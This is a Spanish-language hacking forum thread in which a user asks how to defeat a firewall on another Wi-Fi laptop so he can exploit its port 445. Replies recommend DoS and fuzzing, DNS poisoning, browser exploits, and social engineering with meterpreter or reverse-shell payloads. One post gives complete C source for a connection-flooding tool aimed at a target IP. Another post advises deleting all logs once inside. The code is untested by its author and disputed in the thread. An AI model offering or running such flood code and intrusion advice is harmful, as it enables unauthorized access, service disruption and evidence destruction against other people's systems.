Autor
|
Tema: que metodo funciona mejor contra un firewall? (Leído 13,380 veces)
|
Belial & Grimoire
Desconectado
Mensajes: 559
Tea_Madhatter
|
hola
una pregunta... hay quienes dicen que hacer un fuzz al firewall lo tumba, pero que tambien puede tirar el servicio, tambien se dice que se puede docear, solo encontre que es como un DoS, pero no se que tan efectivo sea, y hay otros que dicen que es mejor usar un exploit por browser o bypass
alguien ha tenido un buen resultado con alguno de esos, ya que me gustaria intentar con el fuzz, ya descargue un pdf que dicen que es muy bueno sobre eso y lei en el foro que se puede hacer un socket para hacerlo, pero ademas de hacer eso... cual seria mas recomendable?
y aparte de leer el pdf, espero me puedan dar una explicacion rapida de que hace un fuzzer para tumbar el firewall?, tengo que mandar basura al firewall hasta que falle?, y se tiene que hacer rapido o por partes, porque me imagino que alertara el firewall si se hace rapido, pero no se si esa es la funcion del fuzzer, espero me puedan ayudar
salu2
|
|
|
En línea
|
.
|
|
|
Garfield07
Desconectado
Mensajes: 1.121
¡Este año voy a por todas! JMJ 2011
|
Intenta acceder a el y poner excepciones o algo... Md: Si, mandar datos hasta que se tumbe, pero hay excepciones, pues a lo mejor controla la cantidad de datos... Es tan simple como hacer un BoF que sobreescriba el ret con As. Pero si controla los datos... Mira el codigo, desensambla...
|
|
|
En línea
|
* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente. * No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado. * Si compila esta bien, si arranca es perfecto. ¡Wiki elhacker.net!Un saludo
|
|
|
braulio--
Wiki
Desconectado
Mensajes: 896
Imagen recursiva
|
Intenta acceder a el y poner excepciones o algo... Md: Si, mandar datos hasta que se tumbe, pero hay excepciones, pues a lo mejor controla la cantidad de datos... Es tan simple como hacer un BoF que sobreescriba el ret con As. Pero si controla los datos... Mira el codigo, desensambla... Los firewalls no suelen tener este tipo de fallos tan claros y ¿a que te refieres con excepciones? En mi opinión, la solución depende de varios factores : - Si el firewall es para toda la red o si es para el ordenador al que tienes acceso.
- Si es para toda la red habría que ver que es lo que permite y que es lo que no permite . (También habría que saber a donde te vas a conectar )
- Si es para el equipo al que tienes acceso depende del SO.
Estas son algunas de las cosas que importan. ¿Puedes especificar?
|
|
|
En línea
|
|
|
|
Belial & Grimoire
Desconectado
Mensajes: 559
Tea_Madhatter
|
hola bueno, miren... esto es o que estaba intentando estaba tratando de utilizar metasploit, tengo una laptop con windows vista y con el clasico antivirus con firewall, estuve practicando cosas que encontraba con ettercap, pero tuve problemas a la hora de inyeccion de codigo, asi que tratare de buscar algun wifi con athero que han dicho que son buenos para eso encontre una forma a la que le llamaron ataque ninja con metaspliot, que era lanzar todo tipo de ataque a un puerto vulnerable, pero como el unico puerto que me aparece abierto es 5358 o 5357 no recuerdo bien, pues meta no lanza nada los demas puertos los encuentro filtrados, alli es donde encontre que se puede tumbar con fuzzer, o docear o la mejor que seria bypass, el problema es que hasta que no tenga un wifi que pueda hacer una buena inyeccion no puedo hacer por ejemplo mandar un exploit por browser, ya que lo intente utilizando ettercap para hacer que sea algo necesario descargar el exploit, pero no lo logre la otra laptop y esta... estan conectadas a un router por wifi, la que uso tiene linux y quise con metasploit, tratar de explotar el puerto 445 de la otra compu pero como les menciono esta filtrado con el firewall, asi que por eso quise intentar tumbarlo, y con lo que Sagrini menciono me imagino que es mandar basura o 'A' o Nop's hasta que por algun razon desborde la memoria y hacer que se cierre pero aunque pienso intentarlo, espero me puedan decir si ese metodo les ha llegado a funcionar, o cual es mas seguro que funciono para tambien intentarlo... ahorita tambien estoy leyendo un link que habia sobre bypass, mi unico problema es que mi nivel de ensamblador es un poco abajo del basico, si logro entender un poco, pero no muy bien aun. bueno, espero mas respuestas salu2
|
|
|
En línea
|
.
|
|
|
r00ty
Desconectado
Mensajes: 21
|
Yo preferiria utilizar un dns poison, o como dices un exploit por browser, aunque lo mejor seria ingenieria social con algun archivo con meterpreter o reverse shell.
Saludos
|
|
|
En línea
|
|
|
|
Garfield07
Desconectado
Mensajes: 1.121
¡Este año voy a por todas! JMJ 2011
|
Que tal hacer un programita que le abra tantas conexiones que se desborde? Es lo mas seguro que he oido aqui xD! Weno, el code en C es: #include <time.h> //Hora #include <stdio.h> //Funciones basicas entrada/salida #include <string.h> //StrCmp #include <stdlib.h> //Exit y otras #include <signal.h> //Señales de salida #include <arpa/inet.h> //struct sockaddr_in #include <sys/socket.h> //Socket, Connect... struct sockaddr_in host; int sockfd, cont = 0; void shutup (int signal) { printf ("Interrupt signal %d ::: Closing clonnections...\n%d conexions with server\n\n", signal , cont ); close (sockfd); } int finalizar (int state) { if (state == 1) { printf ("Ocurrio un error en tiempo de ejecucion...\n\n"); return 1; } else return 0; } int main (int argc, char *argv []) { struct tm *ahora; char hora [40]; strftime (hora , 40, "%d/%m/%Y %H:%M:%S" , ahora ); printf ("FireVolder 0.1 - By Sagrini (2010) - %s\n", hora ); if (argc != 3) { printf ("Use: %s <target_ip> <port>\n\n", argv [0]); return 1; } signal (SIGTERM, shutup); signal (SIGINT, shutup); host. sin_port=htons (atoi (argv [2])); host.sin_family=AF_INET; host.sin_addr.s_addr=inet_addr (argv [1]); printf ("Gotting connections with %s:%d...\n", inet_ntoa (host. sin_addr), ntohs (host. sin_port)); while (1) { while ((sockfd=socket (2, 1, 0))==1) sleep (1); while (connect (sockfd, (struct sockaddr*)&host, sizeof (host))==-1) sleep (1); cont ++; close (sockfd); } return 0; }
Compila Y usa: De nadas ! Pd: El code es 100% mio. Es sacado de una "plantilla", un viejo code que tenia por ahi (tmb mio xD)... Me puse a borrar cosas y cambiarlas de sitio y vualá!
|
|
« Última modificación: 3 Enero 2011, 12:47 pm por Sagrini »
|
En línea
|
* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente. * No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado. * Si compila esta bien, si arranca es perfecto. ¡Wiki elhacker.net!Un saludo
|
|
|
braulio--
Wiki
Desconectado
Mensajes: 896
Imagen recursiva
|
Mola el código, pero estoy casi seguro de que no va a funcionar. Sería una vulnerabilidad demasiado sencilla como para que siga funcionando en un firewall de ese tipo.
Si quieres ganar el control de la otra máquina, como te ha dicho r00ty, lo mejor sería hacer un DNS poisoning y encontrar algún exploit para su browser o intentar hacer que se descargue un ejecutable infectado con el meterpreter o algo asi.
|
|
|
En línea
|
|
|
|
Garfield07
Desconectado
Mensajes: 1.121
¡Este año voy a por todas! JMJ 2011
|
Jaja pues no te creas, he visto cosas mucho peores xD ya me entiendes ... pues tecnicamente en algunos firewalls si va, pork lo que hace es meter muchas conexiones xD... A lo mejor o: 1) Se cae abajo 2) Intenta responderme al desbloquearse, o sea, que se cae tmb. 3) Me guarda la Ip y a la porra las conexiones, o sea, que se cae tmb, pero con mi ip ocho millones de veces repetida jaja la cosa es que siempre se cae, solo abre conexiones, por lo k a lo mejor, en vez de caerse deja de responder peticiones, y al rato tmb se cae no lo he probado pero funciona por narices xD... PD: A ver al despitao, una vez dentro borrad los logs enteritos!!!
|
|
|
En línea
|
* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente. * No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado. * Si compila esta bien, si arranca es perfecto. ¡Wiki elhacker.net!Un saludo
|
|
|
braulio--
Wiki
Desconectado
Mensajes: 896
Imagen recursiva
|
Jaja pues no te creas, he visto cosas mucho peores xD ya me entiendes ... pues tecnicamente en algunos firewalls si va, pork lo que hace es meter muchas conexiones xD... A lo mejor o: 1) Se cae abajo 2) Intenta responderme al desbloquearse, o sea, que se cae tmb. 3) Me guarda la Ip y a la porra las conexiones, o sea, que se cae tmb, pero con mi ip ocho millones de veces repetida jaja la cosa es que siempre se cae, solo abre conexiones, por lo k a lo mejor, en vez de caerse deja de responder peticiones, y al rato tmb se cae no lo he probado pero funciona por narices xD... PD: A ver al despitao, una vez dentro borrad los logs enteritos!!! Vamos a imaginar que si funciona durante un solo minuto. Si es tan sencillo saltarse los firewalls ¿por qué no existen un millón de tutoriales lammers que expliquen esta técnica? ¿ por qué los expertos en malware hacen las virguerías que hacen para evadir a los firewalls ? Ahora lo pruebo y te contesto.
|
|
|
En línea
|
|
|
|
Garfield07
Desconectado
Mensajes: 1.121
¡Este año voy a por todas! JMJ 2011
|
Weno, yo no lo he provado, pero te aseguro que en algun sitio caera... Y no es tan facil, solo hay que saber programar...
|
|
|
En línea
|
* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente. * No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado. * Si compila esta bien, si arranca es perfecto. ¡Wiki elhacker.net!Un saludo
|
|
|
|
|